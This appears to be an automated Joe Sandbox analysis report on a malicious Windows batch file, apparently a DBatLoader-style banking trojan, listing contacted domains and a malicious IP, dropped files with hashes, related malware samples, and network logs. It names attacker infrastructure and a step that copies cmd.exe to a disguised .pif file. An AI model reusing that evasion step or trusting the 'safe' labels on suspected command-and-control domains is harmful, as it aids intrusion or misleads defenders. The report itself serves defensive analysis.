                                                                                                          https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/viexplorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://www.estspacefox.shop/d05n/www.ebsiteclients.onlineexplorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-bexplorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://schemas.microexplorer.exe, 00000012.00000002.3873956110.0000000007720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000002.3873928957.0000000007710000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000000.1541620806.0000000002C80000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svgexplorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://www.yzsports200.xyzReferer:explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://wns.windows.com/EM0explorer.exe, 00000012.00000003.3077399807.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3879092352.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1558998492.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285822156.000000000BDF5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINtexplorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.ustavoglins.store/d05n/www.estspacefox.shopexplorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        http://www.ultangaziescortbayanlari.online/d05n/explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://aquadream.rs:443/244_IpkokioahlpAnyDesk.PIF, 0000000A.00000002.1533987559.0000000000997000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        http://www.nilink.educationReferer:explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://www.xc31.topexplorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          http://www.yzsports200.xyzexplorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-itexplorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://www.rnuah.xyzReferer:explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              high
URL: http://www.atingdilse.site/d05n/www.askabirokulmumkun.online
Source: explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Reputation: unknown
• Avira URL Cloud: safe
URL: https://%ws/%ws_%ws_%ws/service.svc/%ws
Source: kn.exe
Malicious: false
Reputation: high
URL: https://enterpriseregistration.windows.net/EnrollmentServer/device/
Source: kn.exe
Malicious: false
Reputation: high
URL: http://www.atingdilse.site
Source: explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Reputation: unknown
• Avira URL Cloud: safe
URL: http://www.ebsiteclients.online
Source: explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Reputation: unknown
• Avira URL Cloud: safe
URL: http://www.ebsiteclients.onlineReferer:
Source: explorer.exe, 00000012.00000003.2285181334.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3880593214.000000000C175000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076920705.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285384312.000000000C178000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076543480.000000000C175000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Reputation: unknown
• Avira URL Cloud: safe
URL: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmp
Malicious: false
Reputation: high
URL: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Reputation: high
URL: https://sectigo.com/CPS0
Source: AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmp
Malicious: false
Reputation: high
URL: https://login.microsoftonline.com/%s/oauth2/token
Source: kn.exe
Malicious: false
Reputation: high
IP: 185.102.77.43
Domain: aquadream.rs
Country: Czech Republic
ASN: 198171
ASN Name: HOSTING90UPSTREAMconnectivityCZ
Malicious: true
                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                          Analysis ID:1563771
                                                                                                                                          Start date and time:2024-11-27 13:21:12 +01:00
                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                          Overall analysis duration:0h 11m 39s
                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                          Report type:full
                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:24
                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                          Number of injected processes analysed:1
                                                                                                                                          Technologies:
                                                                                                                                          • HCA enabled
                                                                                                                                          • EGA enabled
                                                                                                                                          • AMSI enabled
                                                                                                                                          Analysis Mode:default
                                                                                                                                          Sample name:A1 igazol#U00e1s.cmd
                                                                                                                                          renamed because original name is a hash value
                                                                                                                                          Original Sample Name:A1 igazols.cmd
                                                                                                                                          Detection:MAL
                                                                                                                                          Classification:mal100.bank.troj.evad.winCMD@35/15@12/1
                                                                                                                                          EGA Information:
                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                          HCA Information:
                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                          • Number of executed functions: 59
                                                                                                                                          • Number of non-executed functions: 208
                                                                                                                                          Cookbook Comments:
                                                                                                                                          • Found application associated with file extension: .cmd
                                                                                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                          • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                          • VT rate limit hit for: A1 igazol#U00e1s.cmd
Time | Type | Description
07:22:11 | API Interceptor | 2x Sleep call for process: AnyDesk.PIF modified
07:22:26 | API Interceptor | 7782756x Sleep call for process: explorer.exe modified
07:23:05 | API Interceptor | 6958309x Sleep call for process: msdt.exe modified
Match: 185.102.77.43 (Associated Sample Name / URL | Detection | Threat Name)
• Confirmation.docx.exe | malicious | DBatLoader, Lokibot
• megerosites.cmd | malicious | DBatLoader, Lokibot
• Uplata_391.cmd | malicious | DBatLoader
Match: aquadream.rs (Associated Sample Name / URL | Detection | Threat Name | Context)
• Confirmation.docx.exe | malicious | DBatLoader, Lokibot | 185.102.77.43
• megerosites.cmd | malicious | DBatLoader, Lokibot | 185.102.77.43
• Uplata_391.cmd | malicious | DBatLoader | 185.102.77.43
Match: HOSTING90UPSTREAMconnectivityCZ (Associated Sample Name / URL | Detection | Threat Name | Context)
• yakov.arm7.elf | malicious | Mirai | 37.46.86.199
• Confirmation.docx.exe | malicious | DBatLoader, Lokibot | 185.102.77.43
• megerosites.cmd | malicious | DBatLoader, Lokibot | 185.102.77.43
• Uplata_391.cmd | malicious | DBatLoader | 185.102.77.43
• sora.arm.elf | malicious | Mirai | 171.33.140.91
• data.exe | malicious | Unknown | 130.193.9.47
• file.log.exe | malicious | Unknown | 130.193.9.47
• data.log.exe | malicious | Unknown | 130.193.9.47
• message.txt.exe | malicious | Unknown | 130.193.9.47
• test.dat.exe | malicious | Unknown | 130.193.9.47
Match: a0e9f5d64349fb13191bc781f81f42e1 (Associated Sample Name / URL | Detection | Threat Name | Context)
• file.exe | malicious | LummaC Stealer | 185.102.77.43
• file.exe | malicious | Unknown | 185.102.77.43
• HQV-224647.docx | malicious | Unknown | 185.102.77.43
• file.exe | malicious | LummaC Stealer | 185.102.77.43
• file.exe | malicious | Unknown | 185.102.77.43
• file.exe | malicious | LummaC Stealer | 185.102.77.43
• file.exe | malicious | Unknown | 185.102.77.43
• file.exe | malicious | LummaC Stealer | 185.102.77.43
• file.exe | malicious | LummaC Stealer | 185.102.77.43
• valid.sh.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.102.77.43
Match: C:\Users\Public\alpha.exe (Associated Sample Name / URL | Detection | Threat Name)
• Documentazione_Doganale_richieste_di_copia.cmd | malicious | DBatLoader
• 78326473_PDF.cmd | malicious | DBatLoader
• iuhmzvlH.cmd | malicious | Unknown
• USD470900_COPY_800BLHSBC882001.PDF.bat | malicious | Remcos, DBatLoader
• Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer
• Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer
• #U00c1raj#U00e1nlat k#U00e9r#U00e9s 12#U00b711#U00b72024#U00b7Pdf.cmd | malicious | Unknown
• #U00c1raj#U00e1nlat k#U00e9r#U00e9s 06.11.2024.cmd | malicious | DBatLoader, FormBook
• TZH3Uk8x45.bat | malicious | DBatLoader, PureLog Stealer, XWorm
• Payment.cmd | malicious | Azorult, DBatLoader
                                                                                                                                                                    Process:C:\Users\Public\kn.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2785282
                                                                                                                                                                    Entropy (8bit):3.9059073213640443
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:qJ9rSnLUBf51zmDG5c2dvSxZXBsmvXd61bcEzjaQOvWKhDkqVAgUxTmOwA6UGeL5:M
                                                                                                                                                                    MD5:5701D503C293645679D856D0C494B94E
                                                                                                                                                                    SHA1:71D664AD536D21ADEDFB84B3F9A16FC89165C1E5
                                                                                                                                                                    SHA-256:CE18404F625BF524666DB80E18E715DD93C20FFB33508ADFC0FE2DC1B9160D3C
                                                                                                                                                                    SHA-512:2805AB3B2CAE50847D9D0E77CCC92FB8F819C8D1BFAD2ABF61BB5F442AD3F77C448C1669C3ADDDDCD201148E8B5303093F853D1BC9C076727FA739D3A8154443
                                                                                                                                                                    Malicious:false
Process:C:\Users\Public\kn.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1392640
Entropy (8bit):7.208071169696138
Encrypted:false
SSDEEP:24576:UxxWMyBNKhfrnjjyal3sTcueSG3YHkfPFLb62+bJb7xtP:WLMulhBFLb67VxtP
MD5:A8AF2D572217E48EEEBDF7DD135F90CD
SHA1:79130F4D66F04C8B6CF6D88307039478060DA9E9
SHA-256:5687AD48C8B8268F79CB520B632175BEADD8CDF7B6E6431A636A518774D47FAA
SHA-512:3385579E987E19DAC4A069510AB9204ECB98C6655D86680668EEE05BCC4901809D9D3F5A30D0A4522DDE45288DAE1F2110988010389A4597FF4B623E5665C596
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Process:C:\Users\Public\Libraries\AnyDesk.PIF
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4
Entropy (8bit):2.0
Encrypted:false
SSDEEP:3:M:M
MD5:E573012ACD22A447024A0E2BD10D6B23
SHA1:386B326345C2B74BD84A0A567A674B35AE332C3D
SHA-256:FB0615E4C79607329C3229D5D55189F680F6FF8EDED6EDE9186E5A89BFA532CA
SHA-512:AC64526E3E5B09F2423FB3DE38FDDDABFE522DA48F959F9C3B63238615C5971493B44EB9B383B4CA3A955398308275A188A54B3B15832BD56580B5CBDE38FA3A
Malicious:false
Preview:46..
Process:C:\Users\Public\Libraries\AnyDesk.PIF
File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
Category:dropped
Size (bytes):62357
Entropy (8bit):4.705712327109906
Encrypted:false
SSDEEP:768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
MD5:B87F096CBC25570329E2BB59FEE57580
SHA1:D281D1BF37B4FB46F90973AFC65EECE3908532B2
SHA-256:D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
SHA-512:72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
Malicious:false
Process:C:\Windows\System32\extrac32.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:modified
Size (bytes):289792
Entropy (8bit):6.135598950357573
Encrypted:false
SSDEEP:6144:k4WA1B9BxDfQWKORSqY4zOcmpdlc3gJdmtolSm:H1BhkWvSqY4zvmjOwJIT
MD5:8A2122E8162DBEF04694B9C3E0B6CDEE
SHA1:F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D
SHA-256:B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450
SHA-512:99E784141193275D4364BA1B8762B07CC150CA3CB7E9AA1D4386BA1FA87E073D0500E61572F8D1B071F2FAA2A51BB123E12D9D07054B59A1A2FD768AD9F24397
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: Documentazione_Doganale_richieste_di_copia.cmd, Detection: malicious
• Filename: 78326473_PDF.cmd, Detection: malicious
• Filename: iuhmzvlH.cmd, Detection: malicious
• Filename: USD470900_COPY_800BLHSBC882001.PDF.bat, Detection: malicious
• Filename: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd, Detection: malicious
• Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd, Detection: malicious
• Filename: #U00c1raj#U00e1nlat k#U00e9r#U00e9s 12#U00b711#U00b72024#U00b7Pdf.cmd, Detection: malicious
• Filename: #U00c1raj#U00e1nlat k#U00e9r#U00e9s 06.11.2024.cmd, Detection: malicious
• Filename: TZH3Uk8x45.bat, Detection: malicious
• Filename: Payment.cmd, Detection: malicious
Process:C:\Windows\SysWOW64\esentutl.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):236544
Entropy (8bit):6.4416694948877025
Encrypted:false
SSDEEP:6144:i4VU52dn+OAdUV0RzCcXkThYrK9qqUtmtime:i4K2B+Ob2h0NXIn
MD5:D0FCE3AFA6AA1D58CE9FA336CC2B675B
SHA1:4048488DE6BA4BFEF9EDF103755519F1F762668F
SHA-256:4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
SHA-512:80E127EF81752CD50F9EA2D662DC4D3BF8DB8D29680E75FA5FC406CA22CAFA5C4D89EF2EAC65B486413D3CDD57A2C12A1CB75F65D1E312A717D262265736D1C2
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\System32\extrac32.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:modified
Size (bytes):1651712
Entropy (8bit):6.144018815244304
Encrypted:false
SSDEEP:24576:MeiElH5YZ5cv6r3HiaZQ8p4XGwiJDgN7MaikGLIsWWi4pT/Y/7hsyDAP760MKR:Me3lZYUvmSu4XTckYD0sWWiwT/MhTzK
MD5:F17616EC0522FC5633151F7CAA278CAA
SHA1:79890525360928A674D6AEF11F4EDE31143EEC0D
SHA-256:D252235AA420B91C38BFEEC4F1C3F3434BC853D04635453648B26B2947352889
SHA-512:3ED65172159CD1BCC96B5A0B41D3332DE33A631A167CE8EE8FC43F519BB3E2383A58737A41D25AA694513A68C639F0563A395CD18063975136DE1988094E9EF7
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\SysWOW64\esentutl.exe
File Type:ASCII text, with CRLF, CR line terminators
Category:dropped
Size (bytes):564
Entropy (8bit):4.559213258257705
Encrypted:false
SSDEEP:12:q6pLExT6ceSbZ7u0wxDDDDDDDDjCaY5n4aYAWS4TB8NGNBG:/pLExT6cp7u0wQakn4al4t8Nd
MD5:0EC1978C7DEABF43A4FC760EC68F2A60
SHA1:887D9B6EE210AFAF91496A6F2F2C99B255B8DDE2
SHA-256:031E9AA615CABA557C9DAC4EB8280AD0535CE9817B9C65BFFBADB77DCEBAD51B
SHA-512:31A919374C8E4A6C1C126C7C9630D49EA2CC5715627746857CADFD79918DE9865036B44A758DA83C1F703299804108B828246780B595296A8C132FB1A6EB7557
Malicious:false
Preview:..Initiating COPY FILE mode..... Source File: C:\\Windows\\System32\\cmd.exe...Destination File: C:\\Users\\Public\\alpha.pif...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x39c00 (236544) (0 MB)....Total bytes written = 0x3a000 (237568) (0 MB).......Operation completed successfully in 0.62 seconds.....
File type:Unicode text, UTF-8 text, with very long lines (468), with CRLF line terminators
Entropy (8bit):4.954128308829519
TrID:
File name:A1 igazol#U00e1s.cmd
File size:3'839'564 bytes
MD5:ebdec3ea8aada5aae98146f1b61a13ed
SHA1:9ed537ca66a14b296010eccdde716b1b1a629fe2
SHA256:6650a769ac035e23964c16c27df892d7725f415dee92582a4c7b4ceeef7345b2
SHA512:c733cb6cf2754bf58ed5729357307dfb311c2e571b273c199a079d0ef96526a23fa8b0e235dc4ff07f77af61f94d32bb26561eb2b4affcd5b71c0c0c649a471e
SSDEEP:49152:bWnHE/6TEgA8/WHmZI3Oqz0oXp2jrCbM799GY:2
TLSH:270693E339AD1DDD2B0532DBB7CFF5640A5FD8416B83DEE4C4D2058A101EACB25889B9
Icon Hash:9686878b929a9886
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-27T13:22:15.857386+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49706 | 185.102.77.43 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 27, 2024 13:22:13.780183077 CET | 49705 | 443 | 192.168.2.8 | 185.102.77.43
Nov 27, 2024 13:22:13.780213118 CET | 443 | 49705 | 185.102.77.43 | 192.168.2.8
Nov 27, 2024 13:22:13.780293941 CET | 49705 | 443 | 192.168.2.8 | 185.102.77.43
Nov 27, 2024 13:22:14.057151079 CET | 49705 | 443 | 192.168.2.8 | 185.102.77.43
Nov 27, 2024 13:22:14.057216883 CET | 443 | 49705 | 185.102.77.43 | 192.168.2.8
Nov 27, 2024 13:22:14.057287931 CET | 49705 | 443 | 192.168.2.8 | 185.102.77.43
Nov 27, 2024 13:22:14.157823086 CET | 49706 | 443 | 192.168.2.8 | 185.102.77.43
Nov 27, 2024 13:22:14.157839060 CET | 443 | 49706 | 185.102.77.43 | 192.168.2.8
Nov 27, 2024 13:22:14.157915115 CET | 49706 | 443 | 192.168.2.8 | 185.102.77.43
Nov 27, 2024 13:22:14.160888910 CET | 49706 | 443 | 192.168.2.8 | 185.102.77.43
Nov 27, 2024 13:22:14.160898924 CET | 443 | 49706 | 185.102.77.43 | 192.168.2.8
Nov 27, 2024 13:22:15.857186079 CET | 443 | 49706 | 185.102.77.43 | 192.168.2.8
